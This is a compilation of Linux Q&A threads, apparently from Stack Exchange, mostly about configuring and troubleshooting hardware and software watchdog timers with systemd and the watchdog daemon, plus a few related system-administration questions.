loop txqueuelen 1000 (Local Loopback)
RX packets 4 bytes 240 (240.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4 bytes 240 (240.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

vpn_vpn_nic: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.20 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::ebcc:65ba:a7f4:a21e prefixlen 64 scopeid 0x20<link>
inet6 fe80::5cab:14ff:fe17:ae3a prefixlen 64 scopeid 0x20<link>
ether 5e:ab:14:17:ae:3a txqueuelen 1000 (Ethernet)
RX packets 2 bytes 122 (122.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34 bytes 5198 (5.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether b8:27:eb:8a:64:c9 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Question1: How can I assign IP address to eth1 when the device connecting eth1 turns off?
Question2: Should I create a virtual bridge to achieve this?
UPDATE1:
I tried Philip's answer such like
sudo arp -s 192.168.1.19 **:**:**:**:**:**, however, output was
SIOCADDRT: Network is unreachable
Did the lack of an established network cause this? Should I create 192.168.1.0?
↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑
After I added
ip route add 192.168.1.0/24 dev eth1
in /etc/dhcpcd.exit-hook, I could pass sudo arp -s 192.168.1.19 **:**:**:**:**:**. But the PC is still sleeping now... :(
|
Wake on lan via my custom router
|
The watchdog did not stop! line is normal behavior. systemd sets a "hardware watchdog" timer as a failsafe, to ensure that if the normal shutdown process freezes or fails, the computer will still shut down after the specified period of time. This time period is defined by the variable ShutdownWatchdogSec= in the file /etc/systemd/system.conf. Here is the description from the docs:
RuntimeWatchdogSec=, ShutdownWatchdogSec=
Configure the hardware watchdog at runtime and at reboot. Takes a timeout value in seconds (or in other time units if suffixed with
"ms", "min", "h", "d", "w"). If RuntimeWatchdogSec= is set to a
non-zero value, the watchdog hardware (/dev/watchdog) will be
programmed to automatically reboot the system if it is not contacted
within the specified timeout interval. The system manager will ensure
to contact it at least once in half the specified timeout interval.
This feature requires a hardware watchdog device to be present, as it
is commonly the case in embedded and server systems. Not all hardware
watchdogs allow configuration of the reboot timeout, in which case the
closest available timeout is picked. ShutdownWatchdogSec= may be used
to configure the hardware watchdog when the system is asked to reboot.
It works as a safety net to ensure that the reboot takes place even if
a clean reboot attempt times out. By default RuntimeWatchdogSec=
defaults to 0 (off), and ShutdownWatchdogSec= to 10min. These settings
have no effect if a hardware watchdog is not available.
It sounds likely, as you indicated, that your actual problem is related to changing ACPI settings. The answers on this Debian forum thread suggest the following:
1) Edit the file at /etc/default/grub and edit the
GRUB_CMDLINE_LINUX line to look like this:
GRUB_CMDLINE_LINUX="reboot=bios"
2) run: update-grub
If reboot=bios doesn't work, they suggest retrying with reboot=acpi.
Do either of these work for you?
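As a side note, both watchdog timeouts quoted above can be set explicitly in /etc/systemd/system.conf if the 10-minute default is unwanted; a hedged example (the values are illustrative, not recommendations):

```ini
# /etc/systemd/system.conf -- illustrative values only
[Manager]
# Keep the runtime hardware watchdog off (the default)
RuntimeWatchdogSec=0
# Give a hung shutdown 2 minutes before the hardware watchdog fires
ShutdownWatchdogSec=2min
```

Note these only take effect if a hardware watchdog device is present, as the documentation quoted above says.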
|
At shutdown I often get the message
watchdog did not stop!
and then the laptop freezes after a few other lines without shutting down.
Any idea on how to fix this? Recently it happened very often, usually when the laptop was powered on for some time.
I am using Debian 8 on an Asus UX32LA
I found this systemd file (it shows a conflict with the shutdown.target), if it may help. My impression is that the problem stems from my attempts to fix the backlight (which actually only works with the grub parameter "acpi_osi=").
[Unit]
Description=Load/Save Screen Backlight Brightness of %i
Documentation=man:systemd-backlight@.service(8)
DefaultDependencies=no
RequiresMountsFor=/var/lib/systemd/backlight
Conflicts=shutdown.target
After=systemd-readahead-collect.service systemd-readahead-replay.service systemd-remount-fs.service
Before=sysinit.target shutdown.target

[Service]
Type=oneshot
RemainAfterExit=yes
ExecStart=/lib/systemd/systemd-backlight load %i
ExecStop=/lib/systemd/systemd-backlight save %i
|
message at shutdown: watchdog did not stop!
|
Most modern PC hardware includes watchdog timer facilities. You can read more about them here via wikipedia: Watchdog Timers. Also from the Linux kernel docs:
excerpt - https://www.kernel.org/doc/Documentation/watchdog/watchdog-api.txt
A Watchdog Timer (WDT) is a hardware circuit that can reset the
computer system in case of a software fault. You probably knew that
already.
Usually a userspace daemon will notify the kernel watchdog driver via
the /dev/watchdog special device file that userspace is still alive,
at regular intervals. When such a notification occurs, the driver
will usually tell the hardware watchdog that everything is in order,
and that the watchdog should wait for yet another little while to
reset the system. If userspace fails (RAM error, kernel bug,
whatever), the notifications cease to occur, and the hardware watchdog
will reset the system (causing a reboot) after the timeout occurs.
The Linux watchdog API is a rather ad-hoc construction and different
drivers implement different, and sometimes incompatible, parts of it.
This file is an attempt to document the existing usage and allow
future driver writers to use it as a reference.
This SO Q&A titled, Who is refreshing hardware watchdog in Linux?, covers the linkage between the Linux kernel and the hardware watchdog timer.
What about the watchdog package?
The description in the RPM makes this pretty clear, IMO. The watchdog daemon can either act as a software watchdog or can interact with the hardware implementation.
excerpt from RPM description
The watchdog program can be used as a powerful software watchdog
daemon or may be alternately used with a hardware watchdog device such
as the IPMI hardware watchdog driver interface to a resident Baseboard
Management Controller (BMC). watchdog periodically writes to
/dev/watchdog; the interval between writes to /dev/watchdog is
configurable through settings in the watchdog sysconfig file.
This configuration file is also used to set the watchdog to be used as
a hardware watchdog instead of its default software watchdog
operation. In either case, if the device is open but not written to
within the configured time period, the watchdog timer expiration will
trigger a machine reboot. When operating as a software watchdog, the
ability to reboot will depend on the state of the machine and
interrupts.
When operating as a hardware watchdog, the machine will experience a
hard reset (or whatever action was configured to be taken upon
watchdog timer expiration) initiated by the BMC.
|
Quite often times when I do a reboot, I get the following error message:
kernel: watchdog watchdog0: watchdog did not stop!
I tried to find out more about watchdog by doing man watchdog, but it says there is no manual entry. I tried yum list watchdog and found that it was not installed. However, when I looked in the /dev directory, I actually found two watchdogs:
watchdog and watchdog0
I am curious. Do I actually own any watchdogs? Why does the kernel complain that it did not stop when I do a reboot?
|
Do I own a watchdog?
|
Q3: What do the results of grep -i nmi /proc/interrupts mean?
It becomes clearer if you see the headings of the columns:
$ cat /proc/interrupts
CPU0 CPU1 CPU2 CPU3
NMI: 24 18 21 18 Non-maskable interrupts
This command displays statistics about the interrupts per CPU.
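To make the column layout concrete, here is a small Python sketch (not from the original answer) that sums the per-CPU counts on such a line:

```python
def sum_counts(line):
    """Sum the per-CPU interrupt counts on a /proc/interrupts line.

    Numeric fields follow the "NMI:" label; the trailing words are the
    human-readable description and are skipped.
    """
    total = 0
    for field in line.split()[1:]:   # skip the "NMI:" label
        if not field.isdigit():      # description text starts here
            break
        total += int(field)
    return total

# Demo with the sample line above; on a live box you would iterate over
# open("/proc/interrupts") instead.
print(sum_counts("NMI: 24 18 21 18 Non-maskable interrupts"))  # 81
```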
Q2: What's the advantage of disabling nmi_watchdog?
The nmi_watchdog can, under some circumstances, generate a high number of NMI interrupts (e.g. when using the local APIC under high system load). A high number of interrupts may slow down your system.
Q1: What could happen if I disable nmi_watchdog permanently?
Imagine your system locks up. There are two possibilities now:
1) You have a hardware NMI button (some servers do). Push it, then the kernel (if properly configured) dumps a trace to console and reboots.
2) Your kernel reaches a halting state that can't be interrupted by any other method. In this case, the watchdog can reboot the machine.
|
Why do we need to keep the nmi_watchdog enabled, and what could happen if I disable it permanently?
As some applications recommend disabling the NMI watchdog to work properly, what's the advantage of disabling it?
And what do the results of this command, grep -i nmi /proc/interrupts, mean?
NMI: 24 18 21 18 Non-maskable interrupts
|
Should I disable NMI watchdog permanently or not?
|
Open
/lib/systemd/system/watchdog.service
and add
[Install]
WantedBy=multi-user.target
systemd needs the [Install] section of a unit to know how it should be enabled/disabled.
|
I'm using a Raspberry Pi B, with Raspbian.
After upgrading to Jessie, watchdog daemon doesn't start at boot anymore. Starting it manually using "sudo service watchdog start" does work.
I tried:purging and reinstalling watchdog
update-rc.d watchdog defaults && update-rc.d watchdog enable
systemctl enable watchdog produces this error: The unit files have no [Install] section. They are not meant to be enabled using systemctl.
I checked:
syslog with systemd verbosity on debug, no results. Other than the watchdog device nothing is mentioned.
systemctl list-units | grep -i watchdog is emtpy (unless I started it manually)
My default runlevel is 5 and the priority of watchdog in /etc/rc5.d/ is also 5.
What else can I try?
|
Watchdog daemon doesn't start at boot
|
If you have a watchdog on your system and a driver that uses /dev/watchdog, all you have to do is kill the process that is feeding it; if there is no such process, then you can touch /dev/watchdog once to turn it on, and if you don't touch it again, it will reset.
You also might be interested in resetting the device the "magic sysrq" way. If you have a kernel with the CONFIG_MAGIC_SYSRQ feature compiled in, then you can echo 1 > /proc/sys/kernel/sysrq to enable it, then echo b > /proc/sysrq-trigger to reboot. When you do this, it reboots immediately, without unmounting or syncing filesystems.
|
Is there a command like
vi > out
vi | out
that I could use to cause a watchdog reset of my embedded Linux device?
|
How do I cause a watchdog reset of my embedded Linux device
|
There are two types of watchdog; hardware and software. On the Orange Pi the SOC chip provides a hardware watchdog. If initialised then it needs to be pinged every so often, otherwise it performs a board reset.
However, not many desktops have hardware watchdogs, so the kernel provides a software version. The kernel itself keeps track of the timeout and forces a reboot. This isn't as good as a hardware watchdog, because if the kernel itself breaks then nothing will trigger the reset. But it works.
The software watchdog can be initialised by loading the softdog module
% modprobe softdog
% dmesg | tail -1
[ 120.573945] softdog: Software Watchdog Timer: 0.08 initialized. soft_noboot=0 soft_margin=60 sec soft_panic=0 (nowayout=0)
We can see this has a 60 second timeout by default.
If I then do
% echo > /dev/watchdog
% dmesg | tail -1
[ 154.514976] watchdog: watchdog0: watchdog did not stop!
We can see the watchdog hadn't timed out.
I then leave the machine idle for a minute and on the console I see
[ 214.624112] softdog: Initiating system reboot
and the OS reboots.
|
On an Orange Pi Zero running a Raspbian server, it's possible to use the watchdog very easily just by running the command echo 1 > /dev/watchdog as root. The idea is that the system will certainly reboot after some time that this command is executed, so I need to keep repeating this command in a regular interval of time to keep the system on. We can implement a watchdog using cron as root and making it execute the following script on boot:
#!/bin/bash
while [ true ]; do
echo 1 > /dev/watchdog
sleep 5
done
This script works fine on the Orange Pi Zero... However, on my desktop computer running Ubuntu 18.04 the command echo 1 > /dev/watchdog doesn't work at all. Is it possible to activate the watchdog on any device running Linux?
|
Is it possible to activate the watchdog on any Linux machine?
|
1. Load hardware module
Firstly, in order to actually 'feed' the watchdog, you need to have the watchdog hardware module loaded. This may not happen automatically as most watchdog drivers are blacklisted in case there is no watchdog daemon (e.g. in /etc/modprobe.d/blacklist-watchdog.conf on an Ubuntu/Debian system). Check to see if /dev/watchdog (or similar) has appeared, as that would imply the module has been loaded.
I don't know what the Supermicro board uses, but it may be the Intel TCO driver (iTCO_wdt). Note that iTCO_wdt might require some other modules like i2c-i801, i2c-smbus to do its magic. Try using modprobe iTCO_wdt to load that module and see if it is accepted.
Success looks like:
iTCO_wdt: Found a Intel PCH TCO device (Version=4, TCOBASE=0x0400)
iTCO_wdt: initialized. heartbeat=120 sec (nowayout=0)
Failure shows nothing after:
iTCO_wdt: Intel TCO WatchDog Timer Driver v1.11
Also check syslog. Otherwise check out the IPMI tools, as they include a watchdog driver.
2. Edit /etc/watchdog.conf
Secondly, you need to edit the watchdog configuration file, like # nano /etc/watchdog.conf.
3. Un-comment watchdog-device = ...
This makes the daemon actually use the /dev/watchdog device to access the module. Otherwise the watchdog will not use the hardware and will rely only on its internal code to soft-reboot a broken machine (which is not so useful).
Again, on starting the watchdog daemon look for messages in syslog about it starting and what hardware module it has found.
|
Supermicro main boards contain a BIOS feature named "Watch Dog Function". Having Debian 6.0.6 with kernel "Linux debian 2.6.32-5-amd64 #1 SMP" we did:Change BIOS "Watch Dog Function" from Disabled to Enabled.
Install the package watchdog (# apt-get install watchdog)
Expected: that would be all for the watchdog function to be correctly installed.
Result: system reboots every (roughly) 5 minutes.
Change BIOS "Watch Dog Function" from Enabled to Disabled fixes the undesired reboots.
The boot process seems to correctly enable the watchdog daemon. At least console displays (when BIOS Watch Dog is disabled):
Starting watchdog keepalive daemon: wd_keepalive.
Stopping watchdog keepalive daemon....
Starting watchdog daemon....
And on reboot this output is generated:
INIT: SUsing makefile-style concurrent boot in runlevel 6.
Stopping watchdog daemon....
Starting watchdog keepalive daemon....
What else needs to be done to configure the BIOS watchdog function and the Linux watchdog daemon to work together correctly?
|
How to correctly configure Debian watchdog daemon for BIOS Watch Dog?
|
Having a watchdog on an embedded system will dramatically improve the availability of the device. Instead of waiting for the user to see that the device is frozen or broken, it will reset if the software fails to update at some interval. Some examples:Linux System http://linux.die.net/man/8/watchdog
VxWorks (RTOS) http://fixunix.com/vxworks/48664-about-vxworks-watchdog.html
QNX Watchdog http://www.qnx.com/solutions/industries/netcom/ha.html
The device is designed in such a way that its state is saved somewhere periodically (like Juniper routers that run FreeBSD, Android phones, and DVRs that run Linux). So even if it is rebooted it should re-enter a working configuration.
|
After reading this question, I was a little confused; it sounds like some daemon reacting by rebooting a system. Is that right? Is it a common occurrence in embedded *nixes?
|
What is a "watchdog reset"?
|
Yes, per the same manual page:
TEST BINARY
If the return code of the check binary is not zero watchdog will assume
an error and reboot the system. A positive exit code is interpreted as
a system error code (see errno.h for details).
So in this particular case (error 101), according to errno.h:
ENETUNREACH 101 /* Network is unreachable */
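The same lookup can be done programmatically; a small Python sketch (not part of the original answer) that translates a watchdog test-binary exit status into its errno name and description:

```python
import errno
import os

# Positive watchdog test-binary exit codes are errno values, per watchdog(8)
code = 101  # the error from the syslog line in the question

# On Linux this prints: ENETUNREACH - Network is unreachable
print(errno.errorcode[code], "-", os.strerror(code))
```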
|
Here's a line from a linux syslog:
watchdog[2423]: shutting down the system because of error 101
However, after searching online and in man watchdog, I cannot find any discussion or explanation of the error codes. Is there any such thing?
|
Error codes for watchdog daemon
|
# Redirecting the whole loop (rather than each echo) opens /dev/watchdog
# once and keeps the file handle open between writes.
while true; do
  echo "0"
  sleep 30
done > /dev/watchdog
|
The hardware watchdog on my system needs a 0 written to /dev/watchdog at less than 60 seconds interval or it will fire. The file handle must be kept open however or the watchdog is then disabled.
E.g.
echo "0" > /dev/watchdogdoes not work, as the file handle is closed after the echo is completed.
Is there any way to setup a loop in bash that will write 0 periodically to /dev/watchdog but keep the file handle open?
|
Any way in Bash to write to a file every X seconds without closing it?
|
This is returning 203. That's usually a systemd message.
Exit codes 200 and above are used by systemd's service manager to indicate problems during process invocation.
See man systemd.exec for details.
203 specifically means:
The actual process execution failed (specifically, the execve(2) system call). Most likely this is caused by a missing or non-accessible executable file.
Check that /usr/bin/npm actually exists and has execute permissions. Also check that you can run /usr/bin/npm yourself.
I usually see this problem from people who run manual installations (installing to other locations such as /usr/local/bin or not installing some dependencies). Installing nodejs from your package manager is usually your easiest route to a working npm.
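systemd's pre-exec check can be mimicked with a few lines of Python (a hypothetical helper, assuming /usr/bin/npm is the path from your unit file; not an official systemd tool):

```python
import os

def explain_exec(path):
    """Report whether execve() of this path would plausibly fail with 203/EXEC."""
    if not os.path.exists(path):
        return f"{path}: missing -> would fail with 203/EXEC"
    if not os.access(path, os.X_OK):
        return f"{path}: not executable -> would fail with 203/EXEC"
    return f"{path}: ok"

print(explain_exec("/bin/sh"))       # a binary that certainly exists
print(explain_exec("/usr/bin/npm"))  # the path from the failing unit
```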
|
My systemctl service doesn't work:
● <appname>.service
Loaded: loaded (/etc/systemd/system/<appname>.service; disabled; vendor prese
Active: failed (Result: exit-code) since Mon 2022-04-04 21:55:20 CEST; 4s ago
Process: 1686 ExecStart=/usr/bin/npm start (code=exited, status=203/EXEC)
Main PID: 1686 (code=exited, status=203/EXEC)

Apr 04 21:55:20 raspberrypi systemd[1]: <appname>.service: Service RestartSec=50
Apr 04 21:55:20 raspberrypi systemd[1]: <appname>.service: Scheduled restart job
Apr 04 21:55:20 raspberrypi systemd[1]: Stopped <appname>.service.
Apr 04 21:55:20 raspberrypi systemd[1]: <appname>.service: Start request repeate
Apr 04 21:55:20 raspberrypi systemd[1]: <appname>.service: Failed with result 'e
Apr 04 21:55:20 raspberrypi systemd[1]: Failed to start <Appname>.service.
systemctl reset-failed <appname>
systemctl start <appname>
^^ don't work.
Can anyone help?
|
Systemctl service failed Exit-code
|
The reason the watchdog daemon was not able to reset the hardware watchdog timer on the Supermicro X9DR3-F motherboard is that the watchdog functionality in UEFI controls a third watchdog, on the Winbond Super I/O 83527 chip. In other words, iTCO_wdt and ipmi_watchdog were the wrong drivers for that watchdog chip.
|
I have a Supermicro X9DR3-F motherboard where JWD jumper pins 1 and 2 are shorted and the watchdog functionality in UEFI is enabled:
This means that the system is reset after around 5 minutes if nothing resets the hardware watchdog timer. I installed the watchdog daemon and configured it to use the iTCO_wdt driver:
$ cat /etc/default/watchdog
# Start watchdog at boot time? 0 or 1
run_watchdog=1
# Start wd_keepalive after stopping watchdog? 0 or 1
run_wd_keepalive=1
# Load module before starting watchdog
watchdog_module="iTCO_wdt"
# Specify additional watchdog options here (see manpage).
$
When the watchdog daemon is started, the driver is loaded without issues:
$ sudo dmesg | grep iTCO_wdt
[ 17.435620] iTCO_wdt: Intel TCO WatchDog Timer Driver v1.11
[ 17.435667] iTCO_wdt: Found a Patsburg TCO device (Version=2, TCOBASE=0x0460)
[ 17.435761] iTCO_wdt: initialized. heartbeat=30 sec (nowayout=0)
$
Also, the /dev/watchdog file is present:
$ ls -l /dev/watchdog
crw------- 1 root root 10, 130 Dec 8 22:36 /dev/watchdog
$
The watchdog-device option in the watchdog daemon configuration points to this file:
$ grep -v ^# /etc/watchdog.conf
watchdog-device = /dev/watchdog
watchdog-timeout = 60
interval = 5
log-dir = /var/log/watchdog
verbose = yes
realtime = yes
priority = 1
heartbeat-file = /var/log/watchdog/heartbeat
heartbeat-stamps = 1000
$
In order to debug the writes to the watchdog device, I have enabled the heartbeat-file option, and it looks like the keepalive messages to /dev/watchdog are being sent:
$ tail /var/log/watchdog/heartbeat
1575830728
1575830728
1575830728
1575830733
1575830733
1575830733
1575830733
1575830733
1575830733
1575830733
$
However, despite this, the server resets itself at roughly five-minute intervals.
My next thought was that maybe the iTCO_wdt driver controls the watchdog in the C606 chipset, and the watchdog resetting the server is instead part of IPMI. So I made sure that the iTCO_wdt driver was not loaded during boot and rebooted the server. Sure enough, /dev/watchdog was no longer present. Now I loaded the ipmi_watchdog module:
$ ls -l /dev/watchdog
ls: cannot access '/dev/watchdog': No such file or directory
$ sudo modprobe ipmi_watchdog
$ sudo dmesg -T | tail -1
[Tue Dec 10 21:12:48 2019] IPMI Watchdog: driver initialized
$ ls -l /dev/watchdog
crw------- 1 root root 10, 130 Dec 10 21:12 /dev/watchdog
$
... and finally started the watchdog daemon, which, based on the /var/log/watchdog/heartbeat file, is writing to /dev/watchdog at a 5s interval. In addition, one can confirm this with strace:
$ ps -p 2296 -f
UID PID PPID C STIME TTY TIME CMD
root 2296 1 0 01:28 ? 00:00:00 /usr/sbin/watchdog
$ sudo strace -y -p 2296
strace: Process 2296 attached
restart_syscall(<... resuming interrupted nanosleep ...>) = 0
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
open("/proc/uptime", O_RDONLY) = 2</proc/uptime>
close(2</proc/uptime>) = 0
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
nanosleep({5, 0}, NULL) = 0
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
open("/proc/uptime", O_RDONLY) = 2</proc/uptime>
close(2</proc/uptime>) = 0
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
nanosleep({5, 0}, NULL) = 0
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
open("/proc/uptime", O_RDONLY) = 2</proc/uptime>
close(2</proc/uptime>) = 0
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
write(1</dev/watchdog>, "\0", 1) = 1
nanosleep({5, 0}, ^Cstrace: Process 2296 detached
<detached ...>
$
The watchdog daemon above with PID 2296 was started with the heartbeat-file option in /etc/watchdog.conf commented out, in order to reduce the write system calls in the strace output.
However, the server still reboots with roughly 300s intervals.
Why isn't the watchdog daemon able to reset the hardware watchdog timer on Supermicro X9DR3-F motherboard?
|
watchdog daemon unable to reset hardware watchdog timer on Supermicro X9DR3-F motherboard
|
Attach a debugger to the systemd process. This will pause it until you detach.
# gdb -p 1
|
I have configured systemd to use hardware watchdog. My kernel version is 5.10
This is the configuration
RuntimeWatchdogSec=120 in /etc/systemd/system.conf
WatchdogDevice=/dev/watchdog1
I can see that systemd is kicking the hardware watchdog and the system is running fine.
I need to test if this hw watchdog indeed resets the hardware so I need to make systemd stop kicking it at run time.
Is this possible ?
I am not able to kill the systemd process.
|
How to make systemd to stop kicking the hardware watchdog
|
I've changed my kernel configuration to this:
CONFIG_WATCHDOG=y
CONFIG_SOFT_WATCHDOG=m
CONFIG_AT91SAM9X_WATCHDOG=y
Now my watchdog timer is running. I only had to edit /etc/watchdog.conf in order to set up tests.
|
I've been struggling with the watchdog timer (WDT) for a while. I can't get it working.
My microcontroller board is an AriaG25, based on the AT91SAM9G25. I have used this tutorial to compile the kernel. The kernel settings related to the WDT look like this:
CONFIG_WATCHDOG=y
CONFIG_AT91SAM9X_WATCHDOG=y The kernel has been compiled without problem and boots succesfully. I've installed the watchdog deamon software via apt-get. And now I'm stuck. How do I get the watchdog working? I read a lot about /dev/watchdog. I don't have that file. Do I have to put the driver for my hardware there? Is this a driver?
|
How enable watchdog?
|
My personal favorite is earlyoom (included and enabled by default in Fedora 32): https://github.com/rfjakob/earlyoom
Otherwise you can choose from:
Nohang: https://github.com/hakavlad/nohang
oomd: https://github.com/facebookincubator/oomd
low-memory-monitor: https://gitlab.freedesktop.org/hadess/low-memory-monitor/
psi-monitor: https://github.com/endlessm/eos-boot-helper/tree/master/psi-monitor
Edit 2021-12-21: Modern distros with systemd now include a built-in OOM killer called systemd-oomd; check man systemd-oomd for more details.
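The ulimit idea raised in the question also works for simple cases, with the caveat that it caps a single process's address space rather than watching overall memory pressure the way earlyoom does. A rough sketch, with python3 standing in for the memory-hungry notebook kernel:

```shell
# Cap the virtual address space of a child process at ~200 MB
# (ulimit -v takes KiB). A 1 GB allocation then fails inside the
# process with MemoryError instead of freezing the whole box.
(
  ulimit -v 204800
  python3 -c 'bytearray(10**9)'
)
echo "allocation exit status: $?"   # non-zero: the limit was enforced
```

The limit only applies to the subshell and its children, so the rest of the session is unaffected.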
|
I have the following situation - I've got a remote PC with an encrypted drive. If the PC needs a restart, I need to be physically present to enter the decryption password because I don't have any way of ssh-ing to it before the OS is loaded.
With this in mind, I use the PC to run my jupyter notebook. The only problem is that sometimes I end up executing a piece of code which quickly consumes all available memory (32G), and then the machine becomes unresponsive and that's it for my access to it.
I remember at uni, writing a C program which in a loop launched itself within itself - basically a RAM hog. The program got killed by a watchdog daemon before eating up all available memory and crashing the PC. What can I do to achieve this? Play around with ulimit? This seems too simple.
Thanks to Artem's suggestion, I found this about the solution he has proposed. Seems earlyoom will do the trick.
https://www.reddit.com/r/linux/comments/d2nssy/a_userspace_outofmemory_killer_oomd_020_released/
|
Memory watchdog for hungry applications
|
This is a known Debian bug. The systemd integration of the Debian watchdog package has gone through several rounds, varying quite wildly. The watchdog package that went out as Debian 8 was actually non-functional, as you have discovered. That wasn't picked up by pre-release testing.
The bug has been fixed for version 5.15-1 of the package, alongside another fix that corrects faulty service unit syntax (also visible in your service unit). This version is not available in Debian 8 backports, although two requests have been made (and apparently ignored) for it to be.
Further readingPaul Menzel (2016-09-19). Syntax error in systemd service file. Bug #838305. Debian bug tracker.
Uwe Storbeck (2014-11-05). watchdog does not start at boot. Bug #768168. Debian bug tracker.
Andreas Steinel (2015-07-22). Not starting automatically on freshly installed Jessie. Bug #793309. Debian bug tracker.
Michael Meskes (2016-02-26). Accepted watchdog 5.15-1 (source amd64) into unstable. debian-devel-changes.
|
I am trying to enable the watchdog service (on Raspbian Jessie).
I have installed watchdog and (hopefully) configured it.
sudo systemctl start watchdog seems to start it OK
systemctl status watchdog.service shows it running:-
● watchdog.service - watchdog daemon
Loaded: loaded (/lib/systemd/system/watchdog.service; static)
Active: active (running) since Mon 2017-02-20 15:52:46 AEDT; 22s ago
Process: 1828 ExecStart=/bin/sh -c [ $run_watchdog != 1 ] || exec /usr/sbin/watchdog $watchdog_options (code=exited, status=0/SUCCESS)
Process: 1824 ExecStartPre=/bin/sh -c [ -z "${watchdog_module}" ] || [ "${watchdog_module}" = "none" ] || /sbin/modprobe $watchdog_module (code=exited, status=0/SUCCESS)
Main PID: 1831 (watchdog)
CGroup: /system.slice/watchdog.service
└─1831 /usr/sbin/watchdog
When I try to enable it with sudo systemctl enable watchdog I get this strange output:
Synchronizing state for watchdog.service with sysvinit using update-rc.d...
Executing /usr/sbin/update-rc.d watchdog defaults
Executing /usr/sbin/update-rc.d watchdog enable
The unit files have no [Install] section. They are not meant to be enabled
using systemctl.
Possible reasons for having this kind of units are:
1) A unit may be statically enabled by being symlinked from another unit's
.wants/ or .requires/ directory.
2) A unit's purpose may be to act as a helper for some other unit which has
a requirement dependency on it.
3) A unit may be started when needed via activation (socket, path, timer,
D-Bus, udev, scripted systemctl call, ...).
Trying sudo update-rc.d watchdog enable did not seem to be successful either:
systemctl list-units | grep watchdog
cat /lib/systemd/system/watchdog.service indeed has no [Install] section
[Unit]
Description=watchdog daemon
Conflicts=wd_keepalive.service
After=multi-user.target
OnFailure=wd_keepalive.service
[Service]
Type=forking
EnvironmentFile=/etc/default/watchdog
ExecStartPre=/bin/sh -c '[ -z "${watchdog_module}" ] || [ "${watchdog_module}" = "none" ] || /sbin/modprobe $watchdog_module'
ExecStart=/bin/sh -c '[ $run_watchdog != 1 ] || exec /usr/sbin/watchdog $watchdog_options'
ExecStopPost=/bin/sh -c '[ $run_wd_keepalive != 1 ] || false'
[Install]
How can I debug this, and get watchdog to run on boot?
I added the following to /lib/systemd/system/watchdog.service:
[Install]
WantedBy=multi-user.target
watchdog now starts. I will need to test to ensure that it works!
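For the record: editing the packaged unit under /lib/systemd/system works, but a package upgrade may overwrite it. For a unit with WantedBy=multi-user.target, the enable step boils down to one symlink, which can be reproduced by hand. A sketch against a scratch directory (on the real system you would drop the $ROOT prefix, use /etc/systemd/system, and run systemctl daemon-reload as root afterwards):

```shell
# Demonstrate, in a throwaway root, the symlink that "systemctl enable"
# would create for a WantedBy=multi-user.target unit.
ROOT=$(mktemp -d)
mkdir -p "$ROOT/etc/systemd/system/multi-user.target.wants"
ln -sf /lib/systemd/system/watchdog.service \
  "$ROOT/etc/systemd/system/multi-user.target.wants/watchdog.service"
ls -l "$ROOT/etc/systemd/system/multi-user.target.wants/"
```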
|
Problem with systemd starting watchdog
|
The software watchdog option is now in Device Drivers->Watchdog Timer Support->Software watchdog
It can be a bit tedious to search for the location of certain options in the menuconfig but it actually took me less than a minute to find it.
|
I need to use the watchdog, but I can't find any watchdog device. Does that mean I need softdog? When I run modprobe softdog it still does not work. So I downloaded the new kernel 4.10.10, but I don't know how to find the softdog module, just like this.
So where can I find the softdog module?
|
I can't find the /dev/watchdog
|
I have fixed it using sdnotify-proxy. I changed my starting command to this:
/usr/local/bin/sdnotify-proxy /run/my-sd.sock \
/usr/bin/docker run -t --name my-container --volume /run/my-sd.sock:/run/my-sd.sock \
--env NOTIFY_SOCKET=/run/my-sd.sock --privileged my
|
So I've been configuring this Docker setup to run a simple service on Linux. The service uses the systemd watchdog and the sdnotify python library to ensure the service doesn't freeze. My problem is that the notify doesn't seem to get out of the docker VM to systemd and the watchdog always timeout. Here's my service:
[Unit]
Description=My Service
After=docker.service
Requires=docker.service
StartLimitIntervalSec=0
[Service]
Type=simple
Restart=always
RestartSec=1
WatchdogSec=190
TimeoutStartSec=0
NotifyAccess=all
User=root
WorkingDirectory=/root
ExecStartPre=-/usr/bin/docker stop my-container
ExecStartPre=-/usr/bin/docker rm my-container
ExecStartPre=-/bin/bash docker_build.sh
ExecStart=/bin/bash docker_start.sh
[Install]
WantedBy=multi-user.target
I start the container using:
docker run -t --name my-container --privileged my-service
My dockerfile looks like this:
FROM python:3.6.9

# Open MQTT and HTTPS ports
EXPOSE 443 8883

COPY requirements.txt requirements.txt
RUN python -m pip install -U -r requirements.txt

CMD python -u -m service_module
Output:
May 05 13:31:55 DIET bash[11155]: [SO][Build Date]: 0.1-V-20200122h13:09
May 05 13:31:55 DIET bash[11155]: [SYS][INFO][17:31:55]: Serial port opened on: /dev/ttyS1
May 05 13:31:56 DIET bash[11155]: [GOOGLE][INFO][17:31:56]: Sent message: {'ip': ['x'], 'versions': {}, 'temperature': 37.793, 'cpu': 15.1, 'memory': 47.7, 'net': {'out': 7.95, 'in': 95.587}}
